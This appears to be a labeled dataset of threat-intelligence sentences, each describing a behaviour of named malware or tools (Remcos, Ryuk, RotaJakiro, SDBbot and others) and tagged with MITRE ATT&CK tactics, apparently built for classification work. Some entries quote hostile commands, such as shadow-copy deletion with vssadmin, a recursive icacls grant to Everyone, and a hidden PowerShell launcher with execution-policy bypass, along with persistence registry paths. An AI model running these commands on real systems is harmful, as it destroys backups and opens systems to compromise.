"RedLeaves attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
RedLeaves can capture screenshots.,['TA0009:Collection']
RedLeaves attempts to add a shortcut file in the Startup folder to achieve persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"RedLeaves has encrypted C2 traffic with RC4, previously using keys of 88888888 and babybear.",['TA0011:Command and Control']
"RedLeaves can gather extended system information including the hostname, OS version number, platform, memory information, time elapsed since system startup, and CPU information.",['TA0007:Discovery']
RedLeaves can obtain information about network parameters.,['TA0007:Discovery']
RedLeaves can enumerate drives and Remote Desktop sessions.,['TA0007:Discovery']
RedLeaves can obtain information about the logged on user both locally and for Remote Desktop sessions.,['TA0007:Discovery']
RedLeaves can communicate to its C2 over HTTP and HTTPS if directed.,['TA0011:Command and Control']
RedLeaves can receive and execute commands with cmd.exe. It can also provide a reverse shell.,['TA0002:Execution']
Reg may be used to find credentials in the Windows Registry.,['TA0006:Credential Access']
Reg may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface.,['TA0005:Defense Evasion']
Reg may be used to gather details from the Windows Registry of a local or remote system at the command-line interface.,['TA0007:Discovery']
RegDuke can use Dropbox as its C2 server.,['TA0011:Command and Control']
RegDuke can decrypt strings with a key either stored in the Registry or hardcoded in the code.,['TA0005:Defense Evasion']
RegDuke can store its encryption key in the Registry.,['TA0005:Defense Evasion']
RegDuke can download files from C2.,['TA0011:Command and Control']
RegDuke can create seemingly legitimate Registry key to store its encryption key.,['TA0005:Defense Evasion']
RegDuke can use control-flow flattening or the commercially available .NET Reactor for obfuscation.,['TA0005:Defense Evasion']
RegDuke can extract and execute PowerShell scripts from C2 communications.,['TA0002:Execution']
"RegDuke can hide data in images, including use of the Least Significant Bit .",['TA0005:Defense Evasion']
RegDuke can persist using a WMI consumer that is launched every time a process named WINWORD.EXE is started.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Regin leveraged several compromised universities as proxies to obscure its origin.,['TA0011:Command and Control']
"The Regin malware platform supports many standard protocols, including SMB.",['TA0011:Command and Control']
Regin has used a hidden file system to store some of its components.,['TA0005:Defense Evasion']
Regin stage 1 modules for 64-bit systems have been found to be signed with fake certificates masquerading as originating from Microsoft Corporation and Broadcom Corporation.,['TA0005:Defense Evasion']
Regin contains a keylogger.,"['TA0009:Collection', 'TA0006:Credential Access']"
Regin appears to have functionality to modify remote Registry information.,['TA0005:Defense Evasion']
The Regin malware platform uses Extended Attributes to store encrypted executables.,['TA0005:Defense Evasion']
"Regin appears to have functionality to sniff for credentials passed over HTTP, SMTP, and SMB.","['TA0006:Credential Access', 'TA0007:Discovery']"
The Regin malware platform can use ICMP to communicate between infected computers.,['TA0011:Command and Control']
The Regin malware platform can use Windows admin shares to move laterally.,['TA0008:Lateral Movement']
"The Regin malware platform supports many standard protocols, including HTTP and HTTPS.",['TA0011:Command and Control']
Remcos can capture data from the system’s microphone.,['TA0009:Collection']
Remcos has a command for UAC bypassing.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Remcos steals and modifies data from the clipboard.,['TA0009:Collection']
Remcos can search for files on the infected machine.,['TA0007:Discovery']
Remcos can upload and download files to and from the victim’s machine.,['TA0011:Command and Control']
Remcos has a command for keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Remcos has full control of the Registry, including the ability to modify it.",['TA0005:Defense Evasion']
"Remcos uses RC4 and base64 to obfuscate data, including Registry entries and file paths.",['TA0005:Defense Evasion']
Remcos has a command to hide itself through injecting into another process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Remcos uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying.,['TA0011:Command and Control']
Remcos uses Python scripts.,['TA0002:Execution']
Remcos can add itself to the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Remcos takes automated screenshots of the infected machine.,['TA0009:Collection']
Remcos searches for Sandboxie and VMware on the system.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Remcos can access a system’s webcam and take pictures.,['TA0009:Collection']
Remcos can launch a remote command line to execute commands on the victim’s machine.,['TA0002:Execution']
Remexi has a command to capture active windows on the machine and retrieve window titles.,['TA0007:Discovery']
Remexi encrypts and adds all gathered browser data into files for upload to C2.,['TA0009:Collection']
Remexi collects text from the clipboard.,['TA0009:Collection']
Remexi decrypts the configuration data using XOR with 25-character keys.,['TA0005:Defense Evasion']
Remexi obfuscates its configuration data with XOR.,['TA0005:Defense Evasion']
"Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel.",['TA0010:Exfiltration']
Remexi searches for files on the system.,['TA0007:Discovery']
Remexi gathers and exfiltrates keystrokes from the machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
Remexi utilizes Run Registry keys in the HKLM hive as a persistence mechanism.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Remexi utilizes scheduled tasks as a persistence mechanism.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Remexi takes screenshots of windows of interest.,['TA0009:Collection']
Remexi uses AutoIt and VBS scripts throughout its execution process.,['TA0002:Execution']
Remexi uses BITSAdmin to communicate with the C2 server over HTTP.,['TA0011:Command and Control']
Remexi silently executes received commands with cmd.exe.,['TA0002:Execution']
Remexi executes received commands with wmic.exe .,['TA0002:Execution']
Remexi achieves persistence using Userinit by adding the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
RemoteCMD copies a file over to the remote system before execution.,['TA0011:Command and Control']
RemoteCMD can execute commands remotely by creating a new schedule task on the remote system,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
RemoteCMD can execute commands remotely by creating a new service on the remote system.,['TA0002:Execution']
RemoteUtilities can enumerate files and directories on a target machine.,['TA0007:Discovery']
RemoteUtilities can upload and download files to and from a target machine.,['TA0011:Command and Control']
RemoteUtilities can use Msiexec to install a service.,['TA0005:Defense Evasion']
RemoteUtilities can take screenshots on a compromised host.,['TA0009:Collection']
Remsec is capable of using DNS for C2.,['TA0011:Command and Control']
Remsec has a package that collects documents from any inserted USB sticks.,['TA0009:Collection']
Remsec has a plugin to detect active drivers of some security products.,['TA0007:Discovery']
Remsec can add or remove applications or ports on the Windows firewall or disable it entirely.,['TA0005:Defense Evasion']
Remsec can perform DLL injection.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Some data in Remsec is encrypted using RC5 in CBC mode, AES-CBC with a hardcoded key, RC4, or Salsa20. Some data is also base64-encoded.",['TA0005:Defense Evasion']
"Remsec can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.",['TA0010:Exfiltration']
Remsec contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.,['TA0010:Exfiltration']
Remsec has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges.,['TA0004:Privilege Escalation']
Remsec is capable of deleting files on the victim. It also securely removes itself after collecting and exfiltrating data.,['TA0005:Defense Evasion']
Remsec is capable of listing contents of folders on the victim. Remsec also searches for custom network encryption software on victims.,['TA0007:Discovery']
Remsec contains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS.,['TA0011:Command and Control']
Remsec contains a keylogger component.,"['TA0009:Collection', 'TA0006:Credential Access']"
Remsec can obtain a list of users.,['TA0007:Discovery']
Remsec can use modules written in Lua for execution.,['TA0002:Execution']
Remsec is capable of using SMTP for C2.,['TA0011:Command and Control']
"The Remsec loader implements itself with the name Security Support Provider, a legitimate Windows function. Various Remsec .exe files mimic legitimate file names used by Microsoft, Symantec, Kaspersky, Hewlett-Packard, and VMWare. Remsec also disguised malicious modules using similar filenames as custom network encryption software on victims.",['TA0005:Defense Evasion']
Remsec has a plugin that can perform ARP scanning as well as port scanning.,['TA0007:Discovery']
"Remsec is capable of using ICMP, TCP, and UDP for C2.",['TA0011:Command and Control']
Remsec harvests plain-text credentials as a password filter registered on domain controllers.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Remsec can obtain a process list from the victim.,['TA0007:Discovery']
Remsec can ping or traceroute a remote host.,['TA0007:Discovery']
Remsec schedules the execution one of its modules by creating a new scheduler task.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Remsec can dump the SAM database.,['TA0006:Credential Access']
Remsec has a plugin detect security products via active drivers.,['TA0007:Discovery']
"Remsec can obtain the OS version information, computer name, processor architecture, machine role, and OS edition.",['TA0007:Discovery']
"Remsec can obtain information about network configuration, including the routing table, ARP cache, and DNS cache.",['TA0007:Discovery']
Remsec can obtain a list of active connections and open ports.,['TA0007:Discovery']
Remsec can obtain information about the current user.,['TA0007:Discovery']
Remsec is capable of using HTTP and HTTPS for C2.,['TA0011:Command and Control']
Responder is used to poison name services to gather hashes and credentials from systems within a local network.,"['TA0009:Collection', 'TA0006:Credential Access']"
Responder captures hashes and credentials that are sent to the system after the name services have been poisoned.,"['TA0006:Credential Access', 'TA0007:Discovery']"
Revenge RAT has a plugin for microphone interception.,['TA0009:Collection']
Revenge RAT used blogpost.com as its primary command and control server during a campaign.,['TA0011:Command and Control']
Revenge RAT uses the Forfiles utility to execute commands on the system.,['TA0005:Defense Evasion']
Revenge RAT has the ability to upload and download files.,['TA0011:Command and Control']
Revenge RAT has a plugin for keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
Revenge RAT uses mshta.exe to run malicious scripts on the system.,['TA0005:Defense Evasion']
Revenge RAT has a plugin for credential harvesting.,['TA0006:Credential Access']
Revenge RAT uses the PowerShell command Reflection.Assembly to load itself into memory to aid in execution.,['TA0002:Execution']
Revenge RAT has a plugin to perform RDP access.,['TA0008:Lateral Movement']
Revenge RAT schedules tasks to run malicious scripts at different intervals.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Revenge RAT has a plugin for screen capture.,['TA0009:Collection']
Revenge RAT uses Base64 to encode information sent to the C2 server.,['TA0011:Command and Control']
"Revenge RAT collects the CPU information, OS information, and system language.",['TA0007:Discovery']
Revenge RAT collects the IP address and MAC address from the system.,['TA0007:Discovery']
Revenge RAT gathers the username from the system.,['TA0007:Discovery']
Revenge RAT has the ability to access the webcam.,['TA0009:Collection']
Revenge RAT uses cmd.exe to execute commands and run scripts on the victim's machine.,['TA0002:Execution']
Revenge RAT creates a Registry key at HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell to survive a system reboot.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Rifdoor has added four additional bytes of data upon launching, then saved the changed version as C:\ProgramData\Initech\Initech.exe.",['TA0005:Defense Evasion']
Rifdoor has encrypted strings with a single byte XOR algorithm.,['TA0005:Defense Evasion']
Rifdoor has been executed from malicious Excel or Word documents containing macros.,['TA0002:Execution']
Rifdoor has created a new registry entry at HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion\Run\Graphics with a value of C:\ProgramData\Initech\Initech.exe /run.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Rifdoor has been distributed in e-mails with malicious Excel or Word documents.,['TA0001:Initial Access']
Rifdoor has encrypted command and control communications with a stream cipher.,['TA0011:Command and Control']
Rifdoor has the ability to identify the Windows version on the compromised host.,['TA0007:Discovery']
Rifdoor has the ability to identify the IP address of the compromised host.,['TA0007:Discovery']
Rifdoor has the ability to identify the username on the compromised host.,['TA0007:Discovery']
Rising Sun can archive data using RC4 encryption and Base64 encoding prior to exfiltration.,['TA0009:Collection']
Rising Sun variants can use SSL for encrypting C2 communications.,['TA0011:Command and Control']
Rising Sun has collected data and files from a compromised host.,['TA0009:Collection']
"Rising Sun has decrypted itself using a single-byte XOR scheme. Additionally, Rising Sun can decrypt its configuration data at runtime.",['TA0005:Defense Evasion']
Configuration data used by Rising Sun has been encrypted using an RC4 stream algorithm.,['TA0005:Defense Evasion']
Rising Sun can send data gathered from the infected machine via HTTP POST request to the C2.,['TA0010:Exfiltration']
Rising Sun can delete files and artifacts it creates.,['TA0005:Defense Evasion']
"Rising Sun can enumerate information about files from the infected system, including file size, attributes, creation time, last access time, and write time. Rising Sun can enumerate the compilation timestamp of Windows executable files.",['TA0007:Discovery']
Rising Sun can modify file attributes to hide files.,['TA0005:Defense Evasion']
Rising Sun can clear a memory blog in the process by overwriting it with junk bytes.,['TA0005:Defense Evasion']
Rising Sun can test a connection to a specified network IP address over a specified port number.,['TA0007:Discovery']
Rising Sun used dynamic API resolutions to various Windows APIs by leveraging `LoadLibrary` and `GetProcAddress`.,['TA0002:Execution']
Rising Sun can enumerate all running processes and process information on an infected machine.,['TA0007:Discovery']
Rising Sun has identified the OS product name from a compromised host by searching the registry for `SOFTWARE\MICROSOFT\Windows NT\ CurrentVersion | ProductName`.,['TA0007:Discovery']
"Rising Sun can detect the computer name, operating system, and drive information, including drive type, total number of bytes on disk, total number of free bytes on disk, and name of a specified volume.",['TA0007:Discovery']
Rising Sun can detect network adapter and IP address information.,['TA0007:Discovery']
Rising Sun can detect the username of the infected host.,['TA0007:Discovery']
Rising Sun has used HTTP and HTTPS for command and control.,['TA0011:Command and Control']
Rising Sun has executed commands using `cmd.exe /c “ > <%temp%>\AM. tmp” 2>&1`.,['TA0002:Execution']
RobbinHood will search for an RSA encryption key and then perform its encryption process on the system files.,['TA0040:Impact']
RobbinHood will search for Windows services that are associated with antivirus software on the system and kill the process.,['TA0005:Defense Evasion']
RobbinHood deletes shadow copies to ensure that all the data cannot be restored easily.,['TA0040:Impact']
RobbinHood disconnects all network shares from the computer with the command net use * /DELETE /Y.,['TA0005:Defense Evasion']
RobbinHood stops 181 Windows services on the system before beginning the encryption process.,['TA0040:Impact']
RobbinHood uses cmd.exe on the victim's computer.,['TA0002:Execution']
RogueRobin has used Google Drive as a Command and Control channel.,['TA0011:Command and Control']
The PowerShell script with the RogueRobin payload was obfuscated using the COMPRESS technique in `Invoke-Obfuscation`.,['TA0005:Defense Evasion']
RogueRobin decodes an embedded executable using base64 and decompresses it.,['TA0005:Defense Evasion']
RogueRobin can save a new file to the system from the C2 server.,['TA0011:Command and Control']
"RogueRobin uses a command prompt to run a PowerShell script from Excel. To assist in establishing persistence, RogueRobin creates %APPDATA%\OneDrive.bat and saves the following string to it:powershell.exe -WindowStyle Hidden -exec bypass -File “%APPDATA%\OneDrive.ps1”.",['TA0002:Execution']
RogueRobin checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals.,['TA0007:Discovery']
RogueRobin created a shortcut in the Windows startup folder to launch a PowerShell script each time the user logs in to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
RogueRobin uses regsvr32.exe to run a .sct file for execution.,['TA0005:Defense Evasion']
RogueRobin has a command named $screenshot that may be responsible for taking screenshots of the victim machine.,['TA0009:Collection']
RogueRobin enumerates running processes to search for Wireshark and Windows Sysinternals suite.,['TA0007:Discovery']
RogueRobin establishes persistence by creating a shortcut in the Windows startup folder to run a script each time the user logs in.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
RogueRobin base64 encodes strings that are sent to the C2 over its DNS tunnel.,['TA0011:Command and Control']
"RogueRobin uses WMI to check BIOS version for VBOX, bochs, qemu, virtualbox, and vm to check for evidence that the script might be executing within an analysis environment.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"RogueRobin gathers BIOS versions and manufacturers, the number of CPU cores, the total physical memory, and the computer name.",['TA0007:Discovery']
RogueRobin gathers the IP address and domain from the victim’s machine.,['TA0007:Discovery']
RogueRobin collects the victim’s username and whether that user is an admin.,['TA0007:Discovery']
RogueRobin uses Windows Script Components.,['TA0002:Execution']
RogueRobin uses various WMI queries to check if the sample is running in a sandbox.,['TA0002:Execution']
"Depending on the Linux distribution, RotaJakiro executes a set of commands to collect device information and sends the collected information to the C2 server.",['TA0009:Collection']
"Depending on the Linux distribution and when executing with root permissions, RotaJakiro may install persistence using a `.conf` file in the `/etc/init/` folder.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"RotaJakiro uses the AES algorithm, bit shifts in a function called `rotate`, and an XOR cipher to decrypt resources required for persistence, process guarding, and file locking. It also performs this same function on encrypted stack strings and the `head` and `key` sections in the network packet structure used for C2 communications.",['TA0005:Defense Evasion']
RotaJakiro sends device and other collected data back to the C2 using the established C2 channels over TCP.,['TA0010:Exfiltration']
"When executing with non-root permissions, RotaJakiro uses the the `shmget API` to create shared memory between other known RotaJakiro processes. This allows processes to communicate with each other and share their PID.",['TA0002:Execution']
RotaJakiro has used the filename `systemd-daemon` in an attempt to appear legitimate.,['TA0005:Defense Evasion']
"When executing with non-root permissions, RotaJakiro uses the the `shmget` API to create shared memory between other known RotaJakiro processes. RotaJakiro also uses the `execvp` API to help its dead process ""resurrect"".",['TA0002:Execution']
"RotaJakiro uses a custom binary protocol using a type, length, value format over TCP.",['TA0011:Command and Control']
RotaJakiro uses a custom binary protocol over TCP port 443.,['TA0011:Command and Control']
"RotaJakiro can monitor the `/proc/PID` directory of known RotaJakiro processes as a part of its persistence when executing with non-root permissions. If the process is found dead, it resurrects the process. RotaJakiro processes can be matched to an associated Advisory Lock, in the `/proc/locks` folder, to ensure it doesn't spawn more than one process.",['TA0007:Discovery']
RotaJakiro uses dynamically linked shared libraries to execute additional functionality using `dlopen` and `dlsym`.,['TA0002:Execution']
RotaJakiro uses ZLIB Compression to compresses data sent to the C2 server in the `payload` section network communication packet.,['TA0011:Command and Control']
"RotaJakiro encrypts C2 communication using a combination of AES, XOR, ROTATE encryption, and ZLIB compression.",['TA0011:Command and Control']
"RotaJakiro executes a set of commands to collect device information, including `uname`. Another example is the `cat /etc/*release | uniq` command used to collect the current OS distribution.",['TA0007:Discovery']
"Depending on the Linux distribution and when executing with root permissions, RotaJakiro may install persistence using a `.service` file under the `/lib/systemd/system/` folder.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"When executing with non-root level permissions, RotaJakiro can install persistence by adding a command to the .bashrc file that executes a binary in the `${HOME}/.gvfsd/.profile/` folder.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"When executing with user-level permissions, RotaJakiro can install persistence using a .desktop file under the `$HOME/.config/autostart/` folder.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Rover automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe.,['TA0009:Collection']
Rover automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. Rover also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.,['TA0010:Exfiltration']
Rover searches for files on local drives based on a predefined list of file extensions.,['TA0009:Collection']
Rover searches for files on attached removable drives based on a predefined list of file extensions every five seconds.,['TA0009:Collection']
Rover automatically searches for files on local drives based on a predefined list of file extensions.,['TA0007:Discovery']
Rover has keylogging functionality.,"['TA0009:Collection', 'TA0006:Credential Access']"
Rover copies files from removable drives to C:\system.,['TA0009:Collection']
Rover has functionality to remove Registry Run key persistence as a cleanup procedure.,['TA0005:Defense Evasion']
Rover persists by creating a Registry entry in HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Rover takes screenshots of the compromised system's desktop and saves them to C:\system\screenshot.bmp for exfiltration every 60 minutes.,['TA0009:Collection']
Royal uses a multi-threaded encryption process that can partially encrypt targeted files with the OpenSSL library and the AES256 algorithm.,['TA0040:Impact']
Royal can identify specific files and directories to exclude from the encryption process.,['TA0007:Discovery']
Royal can delete shadow copy backups with vssadmin.exe using the command `delete shadows /all /quiet`.,['TA0040:Impact']
"Royal can use multiple APIs for discovery, communication, and execution.",['TA0002:Execution']
Royal can scan the network interfaces of targeted systems.,['TA0007:Discovery']
Royal can enumerate the shared resources of a given IP addresses using the API call `NetShareEnum`.,['TA0007:Discovery']
Royal establishes a TCP socket for C2 communication using the API `WSASocketW`.,['TA0011:Command and Control']
"Royal has been spread through the use of phishing campaigns including ""call back phishing"" where victims are lured into calling a number provided through email.",['TA0001:Initial Access']
Royal can use `GetCurrentProcess` to enumerate processes.,['TA0007:Discovery']
Royal can use SMB to connect to move laterally.,['TA0008:Lateral Movement']
Royal can use `RmShutDown` to kill applications and services using the resources that are targeted for encryption.,['TA0040:Impact']
Royal can use `GetNativeSystemInfo` and `GetLogicalDrives` to enumerate system processors and logical drives.,['TA0007:Discovery']
Royal can enumerate IP addresses using `GetIpAddrTable`.,['TA0007:Discovery']
Rubeus can reveal the credentials of accounts that have Kerberos pre-authentication disabled through AS-REP roasting.,['TA0006:Credential Access']
Rubeus can gather information about domain trusts.,['TA0007:Discovery']
Rubeus can forge a ticket-granting ticket.,['TA0006:Credential Access']
Rubeus can use the `KerberosRequestorSecurityToken.GetRequest` method to request kerberoastable service tickets.,['TA0006:Credential Access']
Rubeus can create silver tickets.,['TA0006:Credential Access']
Ruler can be used to enumerate Exchange users and dump the GAL.,['TA0007:Discovery']
Ruler can be used to automate the abuse of Outlook Forms to establish persistence.,['TA0003:Persistence']
Ruler can be used to automate the abuse of Outlook Home Pages to establish persistence.,['TA0003:Persistence']
Ruler can be used to automate the abuse of Outlook Rules to establish persistence.,['TA0003:Persistence']
RunningRAT contains code to compress files.,['TA0009:Collection']
RunningRAT contains code to clear event logs.,['TA0005:Defense Evasion']
RunningRAT contains code to open and copy data from the clipboard.,['TA0009:Collection']
RunningRAT kills antimalware running process.,['TA0005:Defense Evasion']
RunningRAT contains code to delete files from the victim’s machine.,['TA0005:Defense Evasion']
RunningRAT captures keystrokes and sends them back to the C2 server.,"['TA0009:Collection', 'TA0006:Credential Access']"
RunningRAT adds itself to the Registry key Software\Microsoft\Windows\CurrentVersion\Run to establish persistence upon reboot.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"RunningRAT gathers the OS version, logical drives information, processor information, and volume information.",['TA0007:Discovery']
RunningRAT uses a batch file to kill a security program task and then attempts to remove itself.,['TA0002:Execution']
Ryuk has attempted to adjust its token privileges to have the SeDebugPrivilege.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Ryuk has used a combination of symmetric and asymmetric encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.,['TA0040:Impact']
Ryuk has stopped services related to anti-virus.,['TA0005:Defense Evasion']
Ryuk can use stolen domain admin accounts to move laterally within a victim domain.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ryuk has enumerated files and folders on all mounted drives.,['TA0007:Discovery']
Ryuk has used vssadmin Delete Shadows /all /quiet to to delete volume shadow copies and vssadmin resize shadowstorage to force deletion of shadow copies created by third-party applications.,['TA0040:Impact']
Ryuk can create .dll files that actually contain a Rich Text File format document.,['TA0005:Defense Evasion']
"Ryuk has constructed legitimate appearing installation folder paths by calling GetWindowsDirectoryW and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as C:\Users\Public.",['TA0005:Defense Evasion']
"Ryuk has used multiple native APIs including ShellExecuteW to run executables,GetWindowsDirectoryW to create folders, and VirtualAlloc, WriteProcessMemory, and CreateRemoteThread for process injection.",['TA0002:Execution']
Ryuk can use anti-disassembly and code transformation obfuscation techniques.,['TA0005:Defense Evasion']
Ryuk has called CreateToolhelp32Snapshot to enumerate all running processes.,['TA0007:Discovery']
"Ryuk has injected itself into remote processes to encrypt files using a combination of VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Ryuk has used the Windows command line to create a Registry entry under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ryuk has used the C$ network share for lateral movement.,['TA0008:Lateral Movement']
Ryuk can remotely create a scheduled task to execute itself on a system.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Ryuk has called kill.bat for stopping services, disabling services and killing processes.",['TA0040:Impact']
"Ryuk has called GetLogicalDrives to emumerate all mounted drives, and GetDriveTypeW to determine the drive type.",['TA0007:Discovery']
"Ryuk has been observed to query the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language and the value InstallLanguage. If the machine has the value 0x419 , 0x422 , or 0x423 , it stops execution.",['TA0007:Discovery']
Ryuk has called GetIpNetTable in attempt to identify all mounted drives and hosts that have Address Resolution Protocol entries.,['TA0007:Discovery']
Ryuk has used Wake-on-Lan to power on turned off systems for lateral movement.,"['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Ryuk has used cmd.exe to create a Registry entry to establish persistence.,['TA0002:Execution']
Ryuk can launch icacls /grant Everyone:F /T /C /Q to delete every access-based restrictions on files and directories.,['TA0005:Defense Evasion']
S-Type has deleted accounts it has created.,['TA0005:Defense Evasion']
S-Type has uploaded data and files from a compromised host to its C2 servers.,['TA0010:Exfiltration']
"S-Type primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails.",['TA0011:Command and Control']
S-Type has deleted files it has created on a compromised host.,['TA0005:Defense Evasion']
S-Type can download additional files onto a compromised host.,['TA0011:Command and Control']
S-Type has run the command `net user` on a victim.,['TA0007:Discovery']
S-Type may create a temporary user on the system named `Lost_{Unique Identifier}` with the password `pond~!@6”{Unique Identifier}`.,['TA0003:Persistence']
"S-Type may save itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.",['TA0005:Defense Evasion']
"S-Type has used Windows APIs, including `GetKeyboardType`, `NetUserAdd`, and `NetUserDel`.",['TA0002:Execution']
S-Type may create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ IMJPMIJ8.1{3 characters of Unique Identifier}.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"S-Type may create the file %HOMEPATH%\Start Menu\Programs\Startup\Realtek {Unique Identifier}.lnk, which points to the malicious `msdtc.exe` file already created in the `%CommonFiles%` directory.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Some S-Type samples have been packed with UPX.,['TA0005:Defense Evasion']
S-Type uses Base64 encoding for C2 traffic.,['TA0011:Command and Control']
The initial beacon packet for S-Type contains the operating system version and file system of the victim.,['TA0007:Discovery']
S-Type has attempted to determine if a compromised system was using a Japanese keyboard via the `GetKeyboardType` API call.,['TA0007:Discovery']
S-Type has used `ipconfig /all` on a compromised host.,['TA0007:Discovery']
S-Type has run tests to determine the privilege level of the compromised user.,['TA0007:Discovery']
S-Type runs the command net start on a victim.,['TA0007:Discovery']
S-Type uses HTTP for C2.,['TA0011:Command and Control']
S-Type has provided the ability to execute shell commands on a compromised host.,['TA0002:Execution']
"SDBbot has the ability to use application shimming for persistence if it detects it is running as admin on Windows XP or 7, by creating a shim database to patch services.exe.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SDBbot has the ability to access the file system on a compromised host.,['TA0009:Collection']
SDBbot has the ability to decrypt and decompress its payload to enable code execution.,['TA0005:Defense Evasion']
SDBbot has the ability to inject a downloaded DLL into a newly created rundll32.exe process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
SDBbot has sent collected data from a compromised host to its C2 servers.,['TA0010:Exfiltration']
SDBbot has the ability to delete files from a compromised host.,['TA0005:Defense Evasion']
SDBbot has the ability to get directory listings or drive information on a compromised host.,['TA0007:Discovery']
SDBbot has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SDBbot has the ability to clean up and remove data structures from a compromised host.,['TA0005:Defense Evasion']
SDBbot has the ability to download a DLL from C2 to a compromised host.,['TA0011:Command and Control']
SDBbot has the ability to communicate with C2 with TCP over port 443.,['TA0011:Command and Control']
SDBbot has the ability to XOR the strings for its installer component with a hardcoded 128 byte key.,['TA0005:Defense Evasion']
SDBbot can enumerate a list of running processes on a compromised machine.,['TA0007:Discovery']
SDBbot has the ability to use port forwarding to establish a proxy between a target host and C2.,['TA0011:Command and Control']
SDBbot has the ability to add a value to the Registry Run key to establish persistence if it detects it is running with regular user privilege.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SDBbot has the ability to use RDP to connect to victim's machines.,['TA0008:Lateral Movement']
SDBbot has used rundll32.exe to execute DLLs.,['TA0005:Defense Evasion']
SDBbot has used a packed installer file.,['TA0005:Defense Evasion']
"SDBbot has the ability to identify the OS version, OS bit information and computer name.",['TA0007:Discovery']
SDBbot can collected the country code of a compromised machine.,['TA0007:Discovery']
SDBbot has the ability to determine the domain name and whether a proxy is configured on a compromised host.,['TA0007:Discovery']
SDBbot has the ability to identify the user on a compromised host.,['TA0007:Discovery']
SDBbot has the ability to record video on a compromised host.,['TA0009:Collection']
SDBbot has the ability to use the command shell to execute commands on a compromised host.,['TA0002:Execution']
SDelete deletes data in a way that makes it unrecoverable.,['TA0040:Impact']
SDelete deletes data in a way that makes it unrecoverable.,['TA0005:Defense Evasion']
SEASHARPEE can download remote files onto victims.,['TA0011:Command and Control']
SEASHARPEE can timestomp files on victims using a Web shell.,['TA0005:Defense Evasion']
SEASHARPEE is a Web shell.,['TA0003:Persistence']
SEASHARPEE can execute commands on victims.,['TA0002:Execution']
SHARPSTATS has used base64 encoding and XOR to obfuscate PowerShell scripts.,['TA0005:Defense Evasion']
SHARPSTATS has the ability to upload and download files.,['TA0011:Command and Control']
